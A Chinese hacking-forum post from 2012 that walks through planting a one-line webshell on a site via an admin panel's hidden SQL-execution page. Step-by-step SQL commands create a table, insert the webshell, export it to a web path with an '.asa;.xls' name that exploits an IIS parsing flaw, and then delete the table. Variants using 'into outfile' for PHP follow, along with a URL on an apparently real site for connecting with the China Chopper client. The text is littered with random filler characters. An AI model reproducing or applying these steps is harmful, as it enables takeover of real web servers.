中国网络渗透测试联盟

标题: ACCESS执行SQL命令导出一句话SHELL [打印本页]

作者: admin    时间: 2012-9-13 17:53
标题: ACCESS执行SQL命令导出一句话SHELL
好不容易进了后台,发现啥上传啊。备份啊多木有。; G( \5 A0 X( {6 h( B) d' ]
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
# K' e/ ]; U! d3 ]文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,8 V% s  E+ t# v7 s# r5 ?9 V" F
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:- U( _3 e( h$ w7 ~) T6 x/ Q
1.create table cmd (a varchar(50))! m% ~( F: @- T
2.insert into cmd (a) values (‘‘). f+ o8 k5 D  j- x( m
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd  Z' ^5 W8 z+ |+ I
(把表cmd的内容导出为物理路径的一个EXCEL文件)/ f" a# f9 {, y; k* K
4.drop table cmd6 m. y3 w1 c1 v# w7 m. \$ I2 q
利用IIS的BUG成功拿到了WEBSHELL。
0 B3 E1 Q8 n5 Y3 X1 ?7 b4 }; ?0 Y, l2 X" o0 U- X5 w- T' T- H+ \
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
5 R4 }: p, h1 V  _- J: P3 `' R$ j) k, |! Y3 e$ |
  SQL语句意思解释:. g# u& E. v* n0 A
  第一句0 B: E* {( \/ G- h5 L  @) h
  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为505 }0 @0 k2 p7 C/ h% _

5 @8 s% g  c) N4 V- ?% {. F& {3 G  第二句
& @( S7 h! Z; z) y# ^4 v. X  在表cmd的a字段插入一句话木马# m  h1 p, O& N' U
  第三句
6 A! p7 I7 J" n2 K6 L1 z  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件2 g8 M0 }5 x- G$ J

+ b0 N: O1 Y) X9 T  第四句
1 p0 `6 U; W- u, s0 X  删除建立的cmd表2 h- f( ?0 w2 F+ p+ R$ F# l

- Z& `. [) ]0 k6 e: A! K, |  以下内容为测试:
/ p- N& X0 s. z5 w  C, W  Access利用后台SQL执行命令功能导出WebShell:
% |' }% v( j9 z) n2 a6 d0 G  这个更简单:5 @) x1 r# y4 q; _
  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
4 }1 N, c. K9 |3 |7 p  或者& z) q( r) e2 J# n' b
  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]9 U+ Y1 O! f+ R
7 B4 c$ Z$ w$ @1 U
  后台有执行SQL语句功能(vote为已知表段)
& |* y' }9 G8 j" c1 v  希望对大家有所帮助拿shell的又一个思路( c9 [9 Y$ a1 Q( M% n. q  Z+ ^! `





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2